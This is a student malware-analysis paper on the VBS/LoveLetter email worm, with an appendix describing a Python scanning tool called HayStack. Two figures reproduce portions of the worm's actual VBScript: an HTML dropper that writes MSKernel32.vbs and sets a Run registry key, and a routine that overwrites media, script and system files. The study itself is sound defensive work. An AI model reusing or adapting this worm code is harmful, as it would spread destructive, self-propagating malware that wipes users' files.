LoveLetter:A Targeted Analysis Using HeyStack
-
Upload
d3referenced -
Category
Documents
-
view
221 -
download
0
Transcript of LoveLetter:A Targeted Analysis Using HeyStack
8/13/2019 LoveLetter:A Targeted Analysis Using HeyStack
http://slidepdf.com/reader/full/lovelettera-targeted-analysis-using-heystack 1/12
Hoggan 1/12
LoveLetter:A Targeted Analysis Using HeyStack
Written By: Rich Hoggan
Computer and Information Science, Notre Dame de Namur University
Abstract
Malware has become such a global threat to the internet community that malware analysis is
imperative towards understanding how to protect against it. This paper discusses the background of the
VBS/LoveLetter virus, and leads an analysis through it’s source code. Both manual passive analysis is
conducted against VBS/LoveLetter in addition to running HayStack -- a custom built analysis tool.
Area of Focus: Information Technology employees, Cybersecurity employees, Computer Scientists,
Cybersecurity enthusiasts, Reverse Engineers
Keywords: malware analysis, reverse engineering, cybersecurity, computer science
Introduction
From Brain to Flame, computer viruses have been a part of technology since the very beginning.
Viruses can be found in many programming languages and have targeted all major operating systems
which now include mobile operating systems. Even with anti-virus protection, the chances of being
infected and victimized by some type of malware continue to grow. Considering this staggering growth
in malware, malware analysis is a required tactic towards protecting against the various types of
malware that have gone from simply crashing a computer towards stealing private information and even
financial data.
In this paper we will be providing a brief background of the VBS/LoveLetter email worm. And
passive analysis of VBS/LoveLetter’s source code will take part during the rest of the paper. As such,
we will be looking at the key characteristics of the worm, analysing the programming language used to
8/13/2019 LoveLetter:A Targeted Analysis Using HeyStack
http://slidepdf.com/reader/full/lovelettera-targeted-analysis-using-heystack 2/12
Hoggan 2/12
write the worm, isolating the worm’s trigger and payload, and manually analyzing the source code’s
functionality. In addition to manual passive analysis, HayStack -- a custom built analysis tool -- will be
used to pull out information about the virus. This includes searching for registry keys and URL’s that
are referenced in the source code.
A Brief Background of VBS/LoveLetter
VBS/LoveLetter was released into the wild in May of 2000 and the first networks to show a
presence of the worm were in both Asia and Europe. It wouldn’t take long, however, for
VBS/LoveLetter to reach the United States as well as any of the other countries with a wired
infrastructure to the internet. Most notably, the virus managed to infect computers associated with the
Central Intelligence Agency and the Pentagon [1]. In addition to the quick propagation of the virus,
variants began spreading just as quickly. This was most likely due to the fact that the viruses source
code was available after its initial release.
Considering that the virus spread through email, the trigger was associated with an infected
email which contained an attachment called “LOVE-LETTER-FOR-YOU.TXT.vbs” to what users
thought was a love letter sent by someone in their Outlook address book. Once the user double clicked
the attachment, however, the virus executed thus causing an infection of the user’s machine which in turn
activated the self-propagation of the virus sending itself to everyone in the user’s Outlook as well as
iterating through each of the user’s directories in the file system searching for a number of different file
types. If any of these file types were found on the file system, they would be overwritten with the
viruses source code. At this point, the user would be infected with VBS/LoveLetter, and because the
virus over wrote files on the user’s file system, there would be no way to recover the original file. In
order to recover lost data, the user would needed to have an uninfected external backup. Reflecting this
8/13/2019 LoveLetter:A Targeted Analysis Using HeyStack
http://slidepdf.com/reader/full/lovelettera-targeted-analysis-using-heystack 3/12
Hoggan 3/12
outcome, some reports stated data loss reaching into the tens of thousands of dollars [2].
Passive Analysis
A Note on Laboratory Setup
Both manual and automated passive analysis was conducted on a Windows 8.1 machine
running Python 2.7 and the HayStack malware analysis tool.
Dissecting Virus Components
Programming Language Used
VBS/LoveLetter was written using the Microsoft VBS scripting language. While decreasing in
popularity due to languages such as Python, VBS has many facets which made it popular with IT and
system administrators as it could handle many types of automation tasks. Similarly, the VBS scripting
language is an interpreted language. This means that script files are interpreted line by line as opposed
to languages such as C where source code must be passed through a compiler in order to create an
executable file. Furthermore, VBS scripts execute once they are double clicked. This meant that when
users opened the infected email, or double clicked on any of the files that were infected in their file
system, the virus would execute. This was possible due to the fact that the Windows operating system
didn’t display file types automatically but also executed VBS files automatically. Even if the user was
more knowledgeable, there would be no way for the user to realize they were not opening up a web
page but executing a VBS file short of having file types displayed.
Payload and Trigger
The viruses trigger consisted of an infected email which consisted of the atached VBS script.
Essentially, this method of propagation worked because the actual file type was hidden from the user
making it look like a simple HTML file or webpage. Thus when the user opened the email attachment,
8/13/2019 LoveLetter:A Targeted Analysis Using HeyStack
http://slidepdf.com/reader/full/lovelettera-targeted-analysis-using-heystack 4/12
Hoggan 4/12
the VBS file executed instead. The trigger can be seen in figure 1.
[Figure 1 - HTML trigger generation] sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS -
LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@
CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT=@[email protected]=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.
HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@[email protected]=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.
HTM#-#,#-#main#-#)@-@
BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read
this HTML file<BR>- Please press #-#YES#-# button to
Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQU EE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _
"if (window.screen)var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);"&vbcrl f& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _ "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@[email protected]@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set
wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _ "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if
(err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
8/13/2019 LoveLetter:A Targeted Analysis Using HeyStack
http://slidepdf.com/reader/full/lovelettera-targeted-analysis-using-heystack 5/12
Hoggan 5/12
"end if"&vbcrlf& _
"Set regedit = CreateObject(@[email protected]@-@)"&vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^
-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines) lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
Once the trigger was activated, the viruses payload was subsequently activated. The payload consisted
of iterating through the host file system, looking for numerous file types and overwriting them.
Everything from media files (.jpg, .jpeg, .mp3, .mp2), system files (.bat, .com, .ini), web files (.htm,
.html), and even source code files (.vbs, .cpp, c, h) were susceptible to the payload. The only caveat
being that MP3 files were hidden as opposed to overwritten [4]. Part of this code can be seen in figure
2.
[Figure 2 - part of the code that searches for files to overwrite]if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
8/13/2019 LoveLetter:A Targeted Analysis Using HeyStack
http://slidepdf.com/reader/full/lovelettera-targeted-analysis-using-heystack 6/12
Hoggan 6/12
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
Found Registry Keys
Running the registry key scan in HayStack brings back the following output.
[Figure 2 - HayStack registry key scan results]
Looking at figure 2, the virus makes an attempt to download an executable file called
“WIN-BUGSFIX.exe” into the Internet Explorer downloads directory. Without already knowing the
history of the VBS/LoveLetter virus, it could only be assumed that WIN-BUGSFIX.exe is just an
executable of some sort, however, suspicions would seem to indicate that it’s most likely an exterior
threat, most likely a trojan horse. Finally, correlations can be made between code in the virus and the
8/13/2019 LoveLetter:A Targeted Analysis Using HeyStack
http://slidepdf.com/reader/full/lovelettera-targeted-analysis-using-heystack 7/12
Hoggan 7/12
registry keys referencing MSKernel32.vbs and Win32DLL.vbs which are both system files to the
Windows operating system. In this case, however, the virus attempts to replace the actual system files
with its own source code due to the fact that these files have “.vbs” file extensions.
Found URL’s
Considering the suspicions formed from the previous scan, running the URL scan on the source
code furthers our suspicions about the potential trojan horse as there is now a URL associated with the
same executable file as shown in figure 3. In addition to the executable file, though, there is also a
domain name which when researched, indicates that server hosting the domain name, skyinet.net,
originates in Manila, Philippines. Researching this domain name also indicates that it’s also the domain
name for an Internet Service Provider or ISP in the Philippines. Once again, without not already
knowing the history of the virus, this information would seem to indicate a potential origin for the virus.
[Figure 3 - HayStack URL scan results]
Concluding Thoughts
While much of the information found about this virus has already been known for quite some
time, the exercise of analysing previously released malware helps in understanding how such viruses
execute on the host file system as well as what steps need to be taken in order to protect from data loss.
8/13/2019 LoveLetter:A Targeted Analysis Using HeyStack
http://slidepdf.com/reader/full/lovelettera-targeted-analysis-using-heystack 8/12
Hoggan 8/12
Considering VBS/LoveLetter, one of the most important steps victims could and should have taken was
maintain backups of their data as there was no way to recover infected data. Similarly, the ability for
the virus to execute its code automatically or without the user realizing code was going to execute was
another serious implication of the virus. This is why current versions of Windows provide a dialog box
when code such as a VBS file is going to execute. As such, maintaining the most recent anti-virus keys
for a particular anti-virus product is extremely important as well as never trusting an email attachment
unless it has been thoroughly scanned for viruses. Because malware is constantly growing in complexity
these tactics amongst others must become part of basic internet usage as it’s really one of the main lines
of defense.
8/13/2019 LoveLetter:A Targeted Analysis Using HeyStack
http://slidepdf.com/reader/full/lovelettera-targeted-analysis-using-heystack 9/12
Hoggan 9/12
Works Cited
[1]Zetter, Kim. "When Love Came to Town: A Virus Investigation." PCWorld . N.p., 13 Nov. 2000.
Web. 08 Oct. 2013.
[2]Crouch, Cameron. "Love Letter's Fallout Continues." PCWorld . N.p., 5 May 2000. Web. 08 Oct.
2013.
8/13/2019 LoveLetter:A Targeted Analysis Using HeyStack
http://slidepdf.com/reader/full/lovelettera-targeted-analysis-using-heystack 10/12
Hoggan 10/12
Appendix A - An Introduction to Using HayStack
Written By: Rich Hoggan
Notre Dame de Namur, Computer and Information Science
Introduction
HayStack was designed as a tool for analyzing malicious code. Instead of manually looking through a
malicious specimen, using HayStack, one is able to scan for particular information more efficiently.
HayStack was designed to conduct the following analysis:
String Scanning
Registry Key Scanning
Function Scanning
URL Scanning
When HayStack runs a particular scan against a malicious specimen, the software generates a report file
which details the results that were found. Similarly, if the particular scan does not come back with
positive scan results, a report file is still generated thus allowing a forensic examiner to build a case for
the type of malware being analyzed regardless of scan results.
Understanding HayStack’s Scanning Characteristics
String Scanning
String scanning is one of the simplest scans that HayStack runs against a malicious specimen in that it
simply looks for lines that include single and/or double quotes. If a line is found containing either of the
two, it’s stored and later sent to the command line as well as the report file. This can be seen in figure
1.
[Figure 1 - example of string scan]
Registry Key Scanning
Where as string scanning simply searches for lines containing single and double quotes, registry key
scanning goes a step further by looking for any of the common registry keys that might be referenced in
the malicious code. If a registry key is found, it is stored and passed to the command line as well as its
8/13/2019 LoveLetter:A Targeted Analysis Using HeyStack
http://slidepdf.com/reader/full/lovelettera-targeted-analysis-using-heystack 11/12
Hoggan 11/12
own report file. Figure 2 shows what this output might look like.
[Figure 2 - example of registry key scanning]
Function Scanning
Considering the fact that malicious specimens can be written in a variety of languages, it’s quite possible
that functions, methods, or sub-routines will have been written so as to facilitate functionality of the
malicious specimen. Now it should be pointed out, that the word function is not referring to the use of functions designed into the programming language, but the functions that were written using the
programming language, such as in the following listing.
[Listing 1 - example of a function, method, or sub-routine]
public void printHello()
System.out.println(“Hello World!”);
As such, HayStack scans for functions by looking for lines of code that contain the most typical function
prototype declarations in the most popular programming languages including VBScript, JavaScript,
Java, and C/C++. Similar to other types of scans produced by HayStack, this scan also generates its
own report tile. Lastly, the output of a function scan can be seen in figure 3.
8/13/2019 LoveLetter:A Targeted Analysis Using HeyStack
http://slidepdf.com/reader/full/lovelettera-targeted-analysis-using-heystack 12/12
Hoggan 12/12
[Figure 3 - example of function scan]
URL Scanning
The final scan conducted by HayStack is a URL scan. This scan essentially looks for any type of URL
which can be an indicator of an attempted downloading of an external threat such as a trojan horse or
similar other malicious specimen. As a result, these URLS are stored and passed to the command line
and custom report file when the scan completes. This can be seen in figure 4.
[Figure 4 - example of URL scan]
Future Development
Considering the fact that HayStack is still under development, there are many factors which need to be
considered across all of the scan types. These factors include:
What gets stored
What gets printed to the screen and the various report files
These factors should be taken into account during initial use, as they might produce false positives as
well as will change dramatically as development continues.
More so, HayStack runs as a command line application written in Python. A web application version of
the application is also in development which will allow for users to create accounts and scan malicious
code specimens using HayStack tools without requiring the use of the command line. Furthermore,
additional functionality requirements are being added to HayStack such that the tool will be able to
example executable files for URL’s and similar attributes including registry keys and operating systemfunction calls. This will also be developed as a standalone scan type in the command line version of the
tool.